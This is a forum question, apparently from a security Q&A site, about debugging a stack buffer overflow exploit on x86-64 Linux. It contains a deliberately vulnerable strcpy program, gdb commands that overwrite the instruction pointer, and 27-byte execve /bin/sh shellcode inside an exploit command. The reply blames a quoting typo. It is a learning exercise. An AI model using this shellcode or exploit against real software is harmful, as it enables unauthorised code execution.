Payload in simple buffer overflow exploit redirecting %rip on x86-64 Ubuntu 16.04 LTS leads to early (meaning before %rip is overwritten) segfault

Question

I am trying to do a simple buffer overflow exploitation by overwriting the instruction pointer %rip.

Here's my code of vuln.c

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char* argv[])
{

    char buffer[256];
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
    return 0;
}

which I compile with

gcc vuln.c -o vuln -z execstack -fno-stack-protector

As discussed in the question here I am confident that I am able to control the instruction pointer by feeding something along the lines of

gdb$ r $(python -c 'print "A"*264 + "\x7f\xff\xff\xff\xd8\xc0"[::-1]')

to gdb, as this gives me:

Stopped reason: SIGSEGV
0x00007fffffffd8c0 in ?? ()
gdb$ x 0x00007fffffffd8c0
0x7fffffffd8c0: 0x4141414141414141
gdb$ 

So apparently I managed to redirect execution flow to a place in memory that I wanted.

Now I want to execute some shellcode at this position. For that I use a execve shellcode that I compiled on the same system I am trying to exploit:

$ objdump -d spawnshell.o

spawnshell.o:     file format elf64-x86-64

Disassembly of section .text:

0000000000000000 <_start>:
   0:   48 bb 2f 2f 62 69 6e    movabs $0x68732f6e69622f2f,%rbx
   7:   2f 73 68 
   a:   48 c1 eb 08             shr    $0x8,%rbx
   e:   53                      push   %rbx
   f:   48 89 e7                mov    %rsp,%rdi
  12:   50                      push   %rax
  13:   57                      push   %rdi
  14:   48 89 e6                mov    %rsp,%rsi
  17:   b0 3b                   mov    $0x3b,%al
  19:   0f 05                   syscall 

Spawnshell.o is tested on my system and works.

Written in more compact form:

\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05 - 27 bytes

Now I would expect that I should be able to inject this at the beginning of my buffer, pad the remaining buffer with "A"'s and then again overwrite the instruction pointer in the end:

gdb$ r $(python -c 'print "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05" + A"*(264-27) + "\x7f\xff\xff\xff\xd8\xc0"[::-1]')

If I do this something else that I don't understand happens: I end up somewhere in the __strcpy_sse2_unaligned function at the following command:

<__strcpy_sse2_unaligned+551> movdqu xmm1,XMMWORD PTR [rsi]

and a segfault:

Stopped reason: SIGSEGV
__strcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/strcpy-sse2-unaligned.S:296
296 ../sysdeps/x86_64/multiarch/strcpy-sse2-unaligned.S: No such file or directory.

So my interpretation is, that the strcpy function is choking on something, even before I get to overwrite the %rip.

What is it, or how do I go about finding out what the problem is?

Answer 1

Good lord, I messed up the quotations:

[...] x57\x48\x89\xe6\xb0\x3b\x0f\x05" + A"*(264-27) + "\x7f\x [...]

Voting to close/delete - sorry.